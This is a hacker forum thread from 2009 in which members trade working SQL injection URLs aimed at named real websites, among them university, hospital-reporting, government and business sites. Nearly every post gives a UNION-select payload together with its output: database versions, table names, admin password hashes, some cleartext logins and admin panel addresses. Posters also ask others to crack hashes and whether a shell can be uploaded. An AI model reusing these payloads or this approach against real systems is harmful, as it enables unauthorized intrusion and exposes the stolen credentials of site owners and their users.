SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Kimliksiz

    Kimliksiz Member

    http://skivacationhouse.com/index.php?custom_language=turkish&user=detaliespopupcondrent&pid=1%20AND%201=0%20%75%6E%69%6F%6E%20SELECT%201,concat_ws(0x3e,user,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20FROM%20admin--

    admin>49ba6d17550da5f53c5e5c8b741c1993> (PID: 1)

    http://www.vivavilla.nl/index.php?custom_language=turkish&user=detaliespopupcondrent&pid=1%20AND%201=0%20%75%6E%69%6F%6E%20SELECT%201,concat_ws(0x3e,user,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20FROM%20admin--

    admin>c2e4327c0ed6d23227be395b77b0272e> (PID: 1)
     
  2. AlexSatter

    AlexSatter Member

    http://www.cds.edu/php/facultyProfile.php?categoryId=162+and+substring(version(),1,1)=5

    PR 6

    -------

    http://briz-info.com/sanatorium.php?p=1+and+substring(version(),1,1)=5
     
    #9602 AlexSatter, 4 Jun 2009
    Last edited: 4 Jun 2009
  3. Kimliksiz

    Kimliksiz Member

    http://www.city.vbg.ru/index.php?id=-566%20union%20select%201,2,version(),4,5,6,7,8/*

    4.0.12
     
    #9603 Kimliksiz, 4 Jun 2009
    Last edited by a moderator: 4 Jun 2009
  4. udman

    udman Elder
    sao@chicken
    4.1.12
    sao


    Kimliksiz
    and now in Russian please

    sorry for the off-topic, I'll delete the message later
     
  5. Kimliksiz

    Kimliksiz Member

    Ebs

    http://www.site.com
     
    #9605 Kimliksiz, 4 Jun 2009
    Last edited: 1 Jul 2009
  6. Kimliksiz

    Kimliksiz Member

    http://www.shtypidites.com/lajmet.php?id=540+and+1=2+union+all+select+1,2,3,4,5,concat(emri,char(58),fjalkalimi)+from+admin/*

    http://www.tifozatkuqezi.com/sporti-lajme.php?id=3856+and+1=2+union+all+select+1,2,3,4,5,concat(user,char(58),pass),7,8,9,10,11,12+from+cube_store_con fig/*
     
    #9606 Kimliksiz, 4 Jun 2009
    Last edited by a moderator: 4 Jun 2009
  7. AlexSatter

    AlexSatter Member

    http://www.phcqa.org/reports/hospital/historical.php?id=390256&measure_id=-5001+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

    5.0.32-Debian_7etch8-log:dataphcqa@localhost:dataphcqa
    PR 5
     
  8. udman

    udman Elder
    http://www.provisor.com.ua/
    provisor_webuser@localhost
    provisor_main
    5.0.77-community-log


    Tables as a huge list
    Forum users
    A very large user database, hashed though, all on one page
    PR5

    http://www.chaykafest.com/
    u_chaykafest@localhost
    chaykafest
    4.1.22


    http://sommelier-news.com

    vadim_anons@localhost
    5.0.22
    vadim_anons


    Users as a list
    Users as a list 2 (admins)
    http://sommelier-news.com/news.php?ch=id&id=-1014'+UNION+SELECT+0,concat_ws(0x0b,passw,login,admin),2,3,4,5,6,7,8,9,10,11,12,13+FROM+auth_users+%23&to_ch=all&type=2


    Admin panel
    Login: the same as the pass
    Pass: 330

    "admin in English" - protection from the Turks ))
     
    #9608 udman, 4 Jun 2009
    Last edited: 4 Jun 2009
  9. AlexSatter

    AlexSatter Member

    PR 5, TIC 475
    http://www.model-357.ru/show.php?id_a=64+and+substring(version(),1,1)=4

    http://webmvc.com/show/show.php?sec=10&art=-3+union+select+1,version(),3,4
    4.0.24_Debian-10sarge1-log

    PR 4, TIC 950
     
    #9609 AlexSatter, 4 Jun 2009
    Last edited: 4 Jun 2009
  10. DezMond™

    DezMond™ Elder
    http://www.oissp.org/news/news_full.php?id=-1+union+select+1,2,3,concat(table_name),5,6+from+information_schema.tables+--+

    http://consumerlady.com/news_full.php?id=-1+union+select+1,2,group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables+--+

    http://ford.renessans.ru/news_full.php?id=-1+union+select+1,2,concat_ws(0x3a3a,username,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users+/*+
    admin::$1$WE$fFPL1qCgvP8kQ5xlKUW3R/

    http://prsnso.siberia.net/index.php?rub=page&id=-6+union+select+1,concat_Ws(0x3a3a,login,pass)+from+users+limit+2,1+--+
    soran::821936
    Couldn't find the admin panel(

    http://turakovo.ru/news_full.php?nr=1&id=-1+union+select+name+from+user+--+
    Администратор - output in the title

    http://www.metalside.pl/news/news_full.php?id=1+union+select+concat(table_name)+from+information_schema.tables+limit+34,10+--+
    phpbb_users
     
    #9610 DezMond™, 4 Jun 2009
    Last edited: 4 Jun 2009
  11. farex

    farex Banned

    <<Retail equipment>>
    Code:
    http://kvazar.ru/price_new.htm?group_id=-1+union+all+select+1,2,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),4,5,6,7--+
    Code:
    http://kvazar.ru/admin/ - basic authentication
    5.0.51a-community:*:db_kvazar1:*:kvazar1@localhost:*:redhat-linux-gnu
     
  12. ANUBI$

    ANUBI$ Active Member

    ttp://www.sunriseindustries.ie/products.php?id=-13+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables

    ttp://www.sunriseindustries.ie/products.php?id=-13+union+select+1,coNCAT_ws(chAR(42,32,42),user(),database(),version()),3,4,5,6,7,8,9
    dbsun@localhost* *sunriseindustries* *5.0.45
     
  13. SeNaP

    SeNaP Elder
    Here is an SQL injection, a fairly popular TOP rating of WAP sites

    http://vloge.ru/outtop.php?uid=-238+union+select+1--
    superadmin --------------------------------
    http://vloge.ru/outtop.php?uid=238+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=0x737570657261646d696e

    (ID:login:md5(pass))
    1:XuiVamVrot:50bcb34ab2fc85e6738ec9e6625f2b3d

    P.S.: The login killed me :D, whoever can decrypt the password, please send it by PM
    --------------------------------------
    users---------------------------------
    http://vloge.ru/outtop.php?uid=-238+union+select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+limit+30,1--
    Tables
    http://vloge.ru/outtop.php?uid=238+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=0x7573657273--
    (uid site_name link email info razdel date pass type(9) typeStat vip

    Users: step through with limit

    http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link,pass)+from+users+limit+11,1--
    http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link,pass)+from+users+limit+40,1--
    http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link,pass)+from+users+limit+60,1--
    http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link,pass)+from+users+limit+60,1--
    http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link,pass)+from+users+limit+90,1--
    http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link,pass,email)+from+users+limit+100,1--
    http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link,pass,email)+from+users+limit+160,1--
    http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,site_name,link,pass,email)+from+users+where+uid=254--

    can a shell be uploaded there?
     
    #9613 SeNaP, 4 Jun 2009
    Last edited: 4 Jun 2009
  14. $n@ke

    $n@ke Elder
    PR 5, edu

    PHP:
    http://info.phys.unm.edu/people/index.phtml?pid=151'+union+select+1,2,3,4,5,6,7/*
    User: [email protected]
    Version: 4.1.22
    Dbname: panda
     
  15. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    http://www.mixomat-recordings.de/news.php?action=read&id=1'+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4+--+

    4.0.25-Max-log:v135343:v135343@localhost
     
  16. fox_malder

    fox_malder Active Member

    DATABASE - web147db1
    VERSION - 5.0.67
    USER - web147u1@localhost
    @@VERSION_COMPILE_OS - suse-linux-gnu

    here is the table:

    http://mymakler.ge/index.php?id=-735%27+and+0+union+select+1,2,3,4,5,table_name,7,8,9,10+from+information_schema.tables+limit+24,1--+

    and here are the users

    http://mymakler.ge/index.php?id=-735%27+and+0+union+select+1,2,3,4,5,concat_ws(0x20,pass,name),7,8,9,10+from+user--+

    http://mymakler.ge/index.php?id=-735%27+and+0+union+select+1,2,3,4,5,concat_ws(0x20,pass,name),7,8,9,10+from+user+limit+6,3--+

    pass - kikula
    user - devi
    but they don't work for the admin panel; I got tired of going through them, there are loads of them there, maybe someone will get lucky

    http://mymakler.ge/admin/
     
  17. AlexSatter

    AlexSatter Member

    http://www.spaghettibookclub.org/student.php?student_id=-5151+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15
    5.0.77-community-log
    Pr 5

    DB structure
    users and passwords:
    http://digitalmedia.massey.ac.nz/exposure/student.php?id=6+and+substring(version(),1,1)=5

    PR 5

    http://www.impacttest.com/doctor.php?id=-2911+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44/*

    Database Version: 4.1.22-standard
    Database name: impact_impacttest
    User name: impact_impact@localhost


    found the users table. Guessed the username field; where the password is stored.. no. users:
    mawheatley
    test
    impact
    workshops
     
    #9617 AlexSatter, 5 Jun 2009
    Last edited: 5 Jun 2009
  18. -JC-

    -JC- Member

    http://www.fremontonline.org/menu1.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user,password)+from+mysql.user+--+
     
  19. AlexSatter

    AlexSatter Member

    PR1, TIC 10
    http://videotor.com/raz.php?a=2&id_them=-110+UNION+SELECT+CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64)

    Database Version: 5.0.45
    Database name: videotor_blog
    User name: videotor@localhost


    DB structure

    users and passwords in the form: name,surname,login,password,id_user,mail

    -------------

    http://www.vykihendy.com/raz.php?id=-50+UNION+SELECT+1,2,3,4,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),6/*

    Database Version: 5.0.51a-log
    Database name: vykidb
    User name: vykihendy@localhost


    -------------
    PR 2, TIC 20
    http://www.eldis-holding.ru/raz.php?id_raz=-7+UNION+SELECT+1,2,3,4,5,6,7,8,9,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),11,12/*

    Database Version: 4.1.22-log
    Database name: eldisho3_eldis
    User name: eldisho3@localhost


    There is an admin table, found two fields: id, password
    3 records.

    -------------
    PR 7
    http://www.iett.gov.tr/sss.php?id=14+and+substring(version(),1,1)=5
    ------------

    http://www.mappn.com/soft.php?id=2+and+substring(version(),1,1)=5
    ------------
    http://www.dood.ru/soft.php?id_producer=-54+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),4,5,6,7,8/*

    Database Version: 4.1.22-standard
    Database name: dood_gsms
    User name: dood_admin@localhost
    ------------
    PR 5

    http://www.longfordceb.ie/news/index.php?catid=19&subid=1&nid=-39+UNION+SELECT+CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),2/*

    Database Version: 5.0.45-community-log
    Database name: paulgre_ceb
    User name: [email protected]
     
    #9619 AlexSatter, 5 Jun 2009
    Last edited: 5 Jun 2009
  20. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    PR 5
    http://www.peppermint-jam.de/newb/news.php?id=-1+union+select+1,2,concat_Ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11--&lang=en&lang=en

    booking@localhost:pjcmsb:5.0.32-Debian_7etch8-log
     